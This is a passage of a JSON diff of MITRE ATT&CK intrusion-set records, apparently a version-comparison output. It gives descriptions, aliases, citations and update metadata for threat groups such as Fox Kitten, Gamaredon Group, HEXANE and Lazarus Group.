+                            "url": "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+                        },
+                        {
+                            "source_name": "Secureworks GOLD NIAGARA Threat Profile",
+                            "description": "CTU. (n.d.). GOLD NIAGARA. Retrieved September 21, 2021.",
+                            "url": "https://www.secureworks.com/research/threat-profiles/gold-niagara"
+                        },
+                        {
+                            "source_name": "FireEye FIN7 Shim Databases",
+                            "description": "Erickson, J., McWhirt, M., Palombo, D. (2017, May 3). To SDB, Or Not To SDB: FIN7 Leveraging Shim Databases for Persistence. Retrieved July 18, 2017.",
+                            "url": "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html"
+                        },
+                        {
+                            "source_name": "Morphisec FIN7 June 2017",
+                            "description": "Gorelik, M.. (2017, June 9). FIN7 Takes Another Bite at the Restaurant Industry. Retrieved July 13, 2017.",
+                            "url": "http://blog.morphisec.com/fin7-attacks-restaurant-industry"
+                        },
+                        {
+                            "source_name": "ITG14",
+                            "description": "ITG14 shares campaign overlap with [FIN7](https://attack.mitre.org/groups/G0046).(Citation: IBM Ransomware Trends September 2020)"
+                        },
+                        {
+                            "source_name": "CrowdStrike Carbon Spider August 2021",
+                            "description": "Loui, E. and Reynolds, J. (2021, August 30). CARBON SPIDER Embraces Big Game Hunting, Part 1. Retrieved September 20, 2021.",
+                            "url": "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/"
+                        },
+                        {
+                            "source_name": "Microsoft Threat Actor Naming July 2023",
+                            "description": "Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.",
+                            "url": "https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide"
+                        },
+                        {
+                            "source_name": "Microsoft Ransomware as a Service",
+                            "description": "Microsoft. (2022, May 9). Ransomware as a service: Understanding the cybercrime gig economy and how to protect yourself. Retrieved March 10, 2023.",
+                            "url": "https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/"
+                        },
+                        {
+                            "source_name": "FireEye FIN7 March 2017",
+                            "description": "Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. Retrieved March 8, 2017.",
+                            "url": "https://web.archive.org/web/20180808125108/https:/www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html"
+                        },
+                        {
+                            "source_name": "IBM Ransomware Trends September 2020",
+                            "description": "Singleton, C. and Kiefer, C. (2020, September 28). Ransomware 2020: Attack Trends Affecting Organizations Worldwide. Retrieved September 20, 2021.",
+                            "url": "https://securityintelligence.com/posts/ransomware-2020-attack-trends-new-techniques-affecting-organizations-worldwide/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Edward Millington",
+                        "Eric Loui, CrowdStrike Intelligence",
+                        "Serhii Melnyk, Trustwave SpiderLabs"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack",
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "4.1",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.732000+00:00\", \"old_value\": \"2025-10-24 03:18:58.136000+00:00\"}}}",
+                    "previous_version": "4.1"
+                },
+                {
+                    "type": "intrusion-set",
+                    "id": "intrusion-set--c21dd6f1-1364-4a70-a1f7-783080ec34ee",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-12-21 21:49:47.307000+00:00",
+                    "modified": "2026-05-12 15:12:00.732000+00:00",
+                    "name": "Fox Kitten",
+                    "description": "[Fox Kitten](https://attack.mitre.org/groups/G0117) is threat actor with a suspected nexus to the Iranian government that has been active since at least 2017 against entities in the Middle East, North Africa, Europe, Australia, and North America. [Fox Kitten](https://attack.mitre.org/groups/G0117) has targeted multiple industrial verticals including oil and gas, technology, government, defense, healthcare, manufacturing, and engineering.(Citation: ClearkSky Fox Kitten February 2020)(Citation: CrowdStrike PIONEER KITTEN August 2020)(Citation: Dragos PARISITE )(Citation: ClearSky Pay2Kitten December 2020)",
+                    "aliases": [
+                        "Fox Kitten",
+                        "UNC757",
+                        "Parisite",
+                        "Pioneer Kitten",
+                        "RUBIDIUM",
+                        "Lemon Sandstorm"
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/groups/G0117",
+                            "external_id": "G0117"
+                        },
+                        {
+                            "source_name": "UNC757",
+                            "description": "(Citation: CISA AA20-259A Iran-Based Actor September 2020)(Citation: CrowdStrike PIONEER KITTEN August 2020)"
+                        },
+                        {
+                            "source_name": "Pioneer Kitten",
+                            "description": "(Citation: CrowdStrike PIONEER KITTEN August 2020)(Citation: CISA AA20-259A Iran-Based Actor September 2020)"
+                        },
+                        {
+                            "source_name": "Parisite",
+                            "description": "(Citation: Dragos PARISITE )(Citation: ClearkSky Fox Kitten February 2020)(Citation: CrowdStrike PIONEER KITTEN August 2020)"
+                        },
+                        {
+                            "source_name": "RUBIDIUM",
+                            "description": "(Citation: Microsoft Threat Actor Naming July 2023)"
+                        },
+                        {
+                            "source_name": "Lemon Sandstorm",
+                            "description": "(Citation: Microsoft Threat Actor Naming July 2023)"
+                        },
+                        {
+                            "source_name": "CISA AA20-259A Iran-Based Actor September 2020",
+                            "description": "CISA. (2020, September 15). Iran-Based Threat Actor Exploits VPN Vulnerabilities. Retrieved December 21, 2020.",
+                            "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-259a"
+                        },
+                        {
+                            "source_name": "ClearSky Pay2Kitten December 2020",
+                            "description": "ClearSky. (2020, December 17). Pay2Key Ransomware \u2013 A New Campaign by Fox Kitten. Retrieved December 21, 2020.",
+                            "url": "https://www.clearskysec.com/wp-content/uploads/2020/12/Pay2Kitten.pdf"
+                        },
+                        {
+                            "source_name": "ClearkSky Fox Kitten February 2020",
+                            "description": "ClearSky. (2020, February 16). Fox Kitten \u2013 Widespread Iranian Espionage-Offensive Campaign. Retrieved December 21, 2020.",
+                            "url": "https://www.clearskysec.com/fox-kitten/"
+                        },
+                        {
+                            "source_name": "Dragos PARISITE ",
+                            "description": "Dragos. (n.d.). PARISITE. Retrieved December 21, 2020.",
+                            "url": "https://www.dragos.com/threat/parisite/"
+                        },
+                        {
+                            "source_name": "Microsoft Threat Actor Naming July 2023",
+                            "description": "Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.",
+                            "url": "https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide"
+                        },
+                        {
+                            "source_name": "CrowdStrike PIONEER KITTEN August 2020",
+                            "description": "Orleans, A. (2020, August 31). Who Is PIONEER KITTEN?. Retrieved December 21, 2020.",
+                            "url": "https://www.crowdstrike.com/blog/who-is-pioneer-kitten/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.732000+00:00\", \"old_value\": \"2024-01-08 22:00:34.410000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "2.0"
+                },
+                {
+                    "type": "intrusion-set",
+                    "id": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:32:09.849000+00:00",
+                    "modified": "2026-05-12 15:12:00.731000+00:00",
+                    "name": "Gamaredon Group",
+                    "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) is a suspected Russian cyber espionage group that has targeted military, law enforcement, judiciary, non-profit, and non-governmental organizations in Ukraine since at least 2013. The name [Gamaredon Group](https://attack.mitre.org/groups/G0047) derives from a misspelling of the word \"Armageddon,\" found in early campaigns.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)(Citation: Symantec Shuckworm January 2022)(Citation: Microsoft Actinium February 2022)\n\nIn November 2021, the Ukrainian government publicly attributed [Gamaredon Group](https://attack.mitre.org/groups/G0047) to Russia\u2019s Federal Security Service (FSB) Center 18, an assessment later supported by multiple independent cybersecurity researchers. (Citation: Bleepingcomputer Gamardeon FSB November 2021)(Citation: Microsoft Actinium February 2022)",
+                    "aliases": [
+                        "Gamaredon Group",
+                        "IRON TILDEN",
+                        "Primitive Bear",
+                        "ACTINIUM",
+                        "Armageddon",
+                        "Shuckworm",
+                        "DEV-0157",
+                        "Aqua Blizzard",
+                        "NastyShrew"
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/groups/G0047",
+                            "external_id": "G0047"
+                        },
+                        {
+                            "source_name": "Cloudflare 2026 Threat Report New Threat Actors March 2026",
+                            "description": " Cloudflare. (2026, March 3). Introducing the 2026 Cloudflare Threat Report. Retrieved April 18, 2026.",
+                            "url": "https://blog.cloudflare.com/2026-threat-report/"
+                        },
+                        {
+                            "source_name": "NastyShrew",
+                            "description": "(Citation: Cloudflare 2026 Threat Report New Threat Actors March 2026)"
+                        },
+                        {
+                            "source_name": "ACTINIUM",
+                            "description": "(Citation: Microsoft Actinium February 2022)"
+                        },
+                        {
+                            "source_name": "DEV-0157",
+                            "description": "(Citation: Microsoft Actinium February 2022)"
+                        },
+                        {
+                            "source_name": "Aqua Blizzard",
+                            "description": "(Citation: Microsoft Threat Actor Naming July 2023)"
+                        },
+                        {
+                            "source_name": "Gamaredon Group",
+                            "description": "(Citation: Palo Alto Gamaredon Feb 2017)"
+                        },
+                        {
+                            "source_name": "IRON TILDEN",
+                            "description": "(Citation: Secureworks IRON TILDEN Profile)"
+                        },
+                        {
+                            "source_name": "Armageddon",
+                            "description": "(Citation: Symantec Shuckworm January 2022)"
+                        },
+                        {
+                            "source_name": "Shuckworm",
+                            "description": "(Citation: Symantec Shuckworm January 2022)"
+                        },
+                        {
+                            "source_name": "Primitive Bear",
+                            "description": "(Citation: Unit 42 Gamaredon February 2022)"
+                        },
+                        {
+                            "source_name": "ESET Gamaredon June 2020",
+                            "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020.",
+                            "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"
+                        },
+                        {
+                            "source_name": "TrendMicro Gamaredon April 2020",
+                            "description": "Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020.",
+                            "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/"
+                        },
+                        {
+                            "source_name": "Palo Alto Gamaredon Feb 2017",
+                            "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
+                            "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
+                        },
+                        {
+                            "source_name": "Microsoft Threat Actor Naming July 2023",
+                            "description": "Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.",
+                            "url": "https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide"
+                        },
+                        {
+                            "source_name": "Microsoft Actinium February 2022",
+                            "description": "Microsoft Threat Intelligence Center. (2022, February 4). ACTINIUM targets Ukrainian organizations. Retrieved February 18, 2022.",
+                            "url": "https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/"
+                        },
+                        {
+                            "source_name": "Secureworks IRON TILDEN Profile",
+                            "description": "Secureworks CTU. (n.d.). IRON TILDEN. Retrieved February 24, 2022.",
+                            "url": "https://www.secureworks.com/research/threat-profiles/iron-tilden"
+                        },
+                        {
+                            "source_name": "Symantec Shuckworm January 2022",
+                            "description": "Symantec. (2022, January 31). Shuckworm Continues Cyber-Espionage Attacks Against Ukraine. Retrieved February 17, 2022.",
+                            "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine"
+                        },
+                        {
+                            "source_name": "Bleepingcomputer Gamardeon FSB November 2021",
+                            "description": "Toulas, B. (2018, November 4). Ukraine links members of Gamaredon hacker group to Russian FSB. Retrieved April 15, 2022.",
+                            "url": "https://www.bleepingcomputer.com/news/security/ukraine-links-members-of-gamaredon-hacker-group-to-russian-fsb/"
+                        },
+                        {
+                            "source_name": "Unit 42 Gamaredon February 2022",
+                            "description": "Unit 42. (2022, February 3). Russia\u2019s Gamaredon aka Primitive Bear APT Group Actively Targeting Ukraine. Retrieved February 21, 2022.",
+                            "url": "https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "ESET",
+                        "Trend Micro Incorporated",
+                        "Yoshihiro Kori, NEC Corporation",
+                        "Manikantan Srinivasan, NEC Corporation India",
+                        "Pooja Natarajan, NEC Corporation India"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "3.3",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.731000+00:00\", \"old_value\": \"2026-04-19 00:11:03.898000+00:00\"}}}",
+                    "previous_version": "3.3"
+                },
+                {
+                    "type": "intrusion-set",
+                    "id": "intrusion-set--1f21da59-6a13-455b-afd0-d58d0a5a7d27",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2018-10-17 00:14:20.652000+00:00",
+                    "modified": "2026-05-12 15:12:00.731000+00:00",
+                    "name": "Gorgon Group",
+                    "description": "[Gorgon Group](https://attack.mitre.org/groups/G0078) is a threat group consisting of members who are suspected to be Pakistan-based or have other connections to Pakistan. The group has performed a mix of criminal and targeted attacks, including campaigns against government organizations in the United Kingdom, Spain, Russia, and the United States. (Citation: Unit 42 Gorgon Group Aug 2018)",
+                    "aliases": [
+                        "Gorgon Group"
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/groups/G0078",
+                            "external_id": "G0078"
+                        },
+                        {
+                            "source_name": "Gorgon Group",
+                            "description": "(Citation: Unit 42 Gorgon Group Aug 2018)"
+                        },
+                        {
+                            "source_name": "Unit 42 Gorgon Group Aug 2018",
+                            "description": "Falcone, R., et al. (2018, August 02). The Gorgon Group: Slithering Between Nation State and Cybercrime. Retrieved August 7, 2018.",
+                            "url": "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.5",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.731000+00:00\", \"old_value\": \"2025-04-25 14:49:11.522000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.5"
+                },
+                {
+                    "type": "intrusion-set",
+                    "id": "intrusion-set--f29b7c5e-2439-42ad-a86f-9f8984fafae3",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2018-10-17 00:14:20.652000+00:00",
+                    "modified": "2026-05-12 15:12:00.732000+00:00",
+                    "name": "HEXANE",
+                    "description": "[HEXANE](https://attack.mitre.org/groups/G1001) is a cyber espionage threat group that has targeted oil & gas, telecommunications, aviation, and internet service provider organizations since at least 2017. Targeted companies have been located in the Middle East and Africa, including Israel, Saudi Arabia, Kuwait, Morocco, and Tunisia. [HEXANE](https://attack.mitre.org/groups/G1001)'s TTPs appear similar to [APT33](https://attack.mitre.org/groups/G0064) and [OilRig](https://attack.mitre.org/groups/G0049) but due to differences in victims and tools it is tracked as a separate entity.(Citation: Dragos Hexane)(Citation: Kaspersky Lyceum October 2021)(Citation: ClearSky Siamesekitten August 2021)(Citation: Accenture Lyceum Targets November 2021)",
+                    "aliases": [
+                        "HEXANE",
+                        "Lyceum",
+                        "Siamesekitten",
+                        "Spirlin"
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/groups/G1001",
+                            "external_id": "G1001"
+                        },
+                        {
+                            "source_name": "Spirlin",
+                            "description": "(Citation: Accenture Lyceum Targets November 2021)"
+                        },
+                        {
+                            "source_name": "Siamesekitten",
+                            "description": "(Citation: ClearSky Siamesekitten August 2021)"
+                        },
+                        {
+                            "source_name": "Lyceum",
+                            "description": "(Citation: SecureWorks August 2019)"
+                        },
+                        {
+                            "source_name": "Accenture Lyceum Targets November 2021",
+                            "description": "Accenture. (2021, November 9). Who are latest targets of cyber group Lyceum?. Retrieved June 16, 2022.",
+                            "url": "https://www.accenture.com/us-en/blogs/cyber-defense/iran-based-lyceum-campaigns"
+                        },
+                        {
+                            "source_name": "ClearSky Siamesekitten August 2021",
+                            "description": "ClearSky Cyber Security . (2021, August). New Iranian Espionage Campaign By \u201cSiamesekitten\u201d - Lyceum. Retrieved June 6, 2022.",
+                            "url": "https://www.clearskysec.com/siamesekitten/"
+                        },
+                        {
+                            "source_name": "Dragos Hexane",
+                            "description": "Dragos. (n.d.). Hexane. Retrieved October 27, 2019.",
+                            "url": "https://dragos.com/resource/hexane/"
+                        },
+                        {
+                            "source_name": "Kaspersky Lyceum October 2021",
+                            "description": "Kayal, A. et al. (2021, October). LYCEUM REBORN: COUNTERINTELLIGENCE IN THE MIDDLE EAST. Retrieved June 14, 2022.",
+                            "url": "https://vblocalhost.com/uploads/VB2021-Kayal-etal.pdf"
+                        },
+                        {
+                            "source_name": "SecureWorks August 2019",
+                            "description": "SecureWorks 2019, August 27 LYCEUM Takes Center Stage in Middle East Campaign Retrieved. 2019/11/19 ",
+                            "url": "https://www.secureworks.com/blog/lyceum-takes-center-stage-in-middle-east-campaign"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Dragos Threat Intelligence",
+                        "Mindaugas Gudzis, BT Security"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack",
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.3",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.732000+00:00\", \"old_value\": \"2024-08-14 15:24:19.141000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "2.3"
+                },
+                {
+                    "type": "intrusion-set",
+                    "id": "intrusion-set--c93fccb1-e8e8-42cf-ae33-2ad1d183913a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:32:03.807000+00:00",
+                    "modified": "2026-05-12 15:12:00.732000+00:00",
+                    "name": "Lazarus Group",
+                    "description": "[Lazarus Group](https://attack.mitre.org/groups/G0032) is a North Korean state-sponsored cyber threat group attributed to the Reconnaissance General Bureau (RGB). (Citation: US-CERT HIDDEN COBRA June 2017) (Citation: Treasury North Korean Cyber Groups September 2019) [Lazarus Group](https://attack.mitre.org/groups/G0032) has been active since at least 2009 and is reportedly responsible for the November 2014 destructive wiper attack on Sony Pictures Entertainment, identified by Novetta as part of Operation Blockbuster. Malware used by [Lazarus Group](https://attack.mitre.org/groups/G0032) correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain.(Citation: Novetta Blockbuster)\n\nNorth Korea\u2019s cyber operations have shown a consistent pattern of adaptation, forming and reorganizing units as national priorities shift. These units frequently share personnel, infrastructure, malware, and tradecraft, making it difficult to attribute specific operations with high confidence. Public reporting often uses \u201cLazarus Group\u201d as an umbrella term for multiple North Korean cyber operators conducting espionage, destructive attacks, and financially motivated campaigns.(Citation: Mandiant DPRK Laz Org Breakdown 2022)(Citation: Mandiant DPRK Groups 2023)(Citation: JPCert Blog Laz Subgroups 2025)\n\n",
+                    "aliases": [
+                        "Lazarus Group",
+                        "Labyrinth Chollima",
+                        "HIDDEN COBRA",
+                        "Guardians of Peace",
+                        "ZINC",
+                        "NICKEL ACADEMY",
+                        "Diamond Sleet"
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/groups/G0032",
+                            "external_id": "G0032"
+                        },
+                        {
+                            "source_name": "Labyrinth Chollima",
+                            "description": "(Citation: CrowdStrike Labyrinth Chollima Feb 2022)"
+                        },
+                        {
+                            "source_name": "Diamond Sleet",
+                            "description": "(Citation: Microsoft Threat Actor Naming July 2023)"
+                        },
+                        {
+                            "source_name": "ZINC",
+                            "description": "(Citation: Microsoft ZINC disruption Dec 2017)"
+                        },
+                        {
+                            "source_name": "Lazarus Group",
+                            "description": "(Citation: Novetta Blockbuster)"
+                        },
+                        {
+                            "source_name": "NICKEL ACADEMY",
+                            "description": "(Citation: Secureworks NICKEL ACADEMY Dec 2017)"
+                        },
+                        {
+                            "source_name": "Guardians of Peace",
+                            "description": "(Citation: US-CERT HIDDEN COBRA June 2017)"
+                        },
+                        {
+                            "source_name": "CrowdStrike Labyrinth Chollima Feb 2022",
+                            "description": "CrowdStrike. (2022, February 1). CrowdStrike Adversary Labyrinth Chollima. Retrieved February 1, 2022.",
+                            "url": "https://web.archive.org/web/20210723190317/https://adversary.crowdstrike.com/en-US/adversary/labyrinth-chollima/"
+                        },
+                        {
+                            "source_name": "Mandiant DPRK Groups 2023",
+                            "description": "Michael Barnhart, Austin Larsen, Jeff Johnson, Taylor Long, Michelle Cantos, Adrian Hernandez. (2023, October 10). Assessed Cyber Structure and Alignments of North Korea in 2023. Retrieved August 25, 2025.",
+                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/north-korea-cyber-structure-alignment-2023"
+                        },
+                        {
+                            "source_name": "Mandiant DPRK Laz Org Breakdown 2022",
+                            "description": "Michael Barnhart, Michelle Cantos, Jeffery Johnson, Elias fox, Gary Freas, Dan Scott. (2022, March 23). Not So Lazarus: Mapping DPRK Cyber Threat Groups to Government Organizations. Retrieved September 9, 2025.",
+                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/mapping-dprk-groups-to-government/"
+                        },
+                        {
+                            "source_name": "Microsoft Threat Actor Naming July 2023",
+                            "description": "Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.",
+                            "url": "https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide"
+                        },
+                        {
+                            "source_name": "Novetta Blockbuster",
+                            "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016.",
+                            "url": "https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf"
+                        },
+                        {
+                            "source_name": "Secureworks NICKEL ACADEMY Dec 2017",
+                            "description": "Secureworks. (2017, December 15). Media Alert - Secureworks Discovers North Korean Cyber Threat Group, Lazarus, Spearphishing Financial Executives of Cryptocurrency Companies. Retrieved December 27, 2017.",
+                            "url": "https://www.secureworks.com/about/press/media-alert-secureworks-discovers-north-korean-cyber-threat-group-lazarus-spearphishing"
+                        },
+                        {
+                            "source_name": "Microsoft ZINC disruption Dec 2017",
+                            "description": "Smith, B. (2017, December 19). Microsoft and Facebook disrupt ZINC malware attack to protect customers and the internet from ongoing cyberthreats. Retrieved December 20, 2017.",
+                            "url": "https://blogs.microsoft.com/on-the-issues/2017/12/19/microsoft-facebook-disrupt-zinc-malware-attack-protect-customers-internet-ongoing-cyberthreats/"
+                        },
+                        {
+                            "source_name": "HIDDEN COBRA",
+                            "description": "The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA.(Citation: US-CERT HIDDEN COBRA June 2017)(Citation: US-CERT HOPLIGHT Apr 2019)"
+                        },
+                        {
+                            "source_name": "Treasury North Korean Cyber Groups September 2019",
+                            "description": "US Treasury . (2019, September 13). Treasury Sanctions North Korean State-Sponsored Malicious Cyber Groups. Retrieved September 29, 2021.",
+                            "url": "https://home.treasury.gov/news/press-releases/sm774"
+                        },
+                        {
+                            "source_name": "US-CERT HIDDEN COBRA June 2017",
+                            "description": "US-CERT. (2017, June 13). Alert (TA17-164A) HIDDEN COBRA \u2013 North Korea\u2019s DDoS Botnet Infrastructure. Retrieved July 13, 2017.",
+                            "url": "https://www.us-cert.gov/ncas/alerts/TA17-164A"
+                        },
+                        {
+                            "source_name": "US-CERT HOPLIGHT Apr 2019",
+                            "description": "US-CERT. (2019, April 10). MAR-10135536-8 \u2013 North Korean Trojan: HOPLIGHT. Retrieved April 19, 2019.",
+                            "url": "https://www.us-cert.gov/ncas/analysis-reports/AR19-100A"
+                        },
+                        {
+                            "source_name": "JPCert Blog Laz Subgroups 2025",
+                            "description": "\u4f50\u3005\u6728\u52c7\u4eba Hayato Sasaki. (2025, March 25). Tempted to Classifying APT Actors: Practical Challenges of Attribution in the Case of Lazarus\u2019s Subgroup. Retrieved August 25, 2025.",
+                            "url": "https://blogs.jpcert.or.jp/en/2025/03/classifying-lazaruss-subgroup.html"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Kyaw Pyiyt Htet, @KyawPyiytHtet",
+                        "Dragos Threat Intelligence",
+                        "MyungUk Han, ASEC",
+                        "Jun Hirata, NEC Corporation",
+                        "Manikantan Srinivasan, NEC Corporation India",
+                        "Pooja Natarajan, NEC Corporation India"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack",
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "5.0",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.732000+00:00\", \"old_value\": \"2025-10-24 01:29:21.748000+00:00\"}}}",
+                    "previous_version": "5.0"
+                },
+                {
+                    "type": "intrusion-set",
+                    "id": "intrusion-set--abc5a1d4-f0dc-49d1-88a1-4a80e478bb03",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-11-24 19:26:27.305000+00:00",
+                    "modified": "2026-05-12 15:12:00.732000+00:00",
+                    "name": "LazyScripter",
+                    "description": "[LazyScripter](https://attack.mitre.org/groups/G0140) is threat group that has mainly targeted the airlines industry since at least 2018, primarily using open-source toolsets.(Citation: MalwareBytes LazyScripter Feb 2021)",
+                    "aliases": [
+                        "LazyScripter"
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/groups/G0140",
+                            "external_id": "G0140"
+                        },
+                        {
+                            "source_name": "LazyScripter",
+                            "description": "(Citation: MalwareBytes LazyScripter Feb 2021)"
+                        },
+                        {
+                            "source_name": "MalwareBytes LazyScripter Feb 2021",
+                            "description": "Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 17, 2024.",
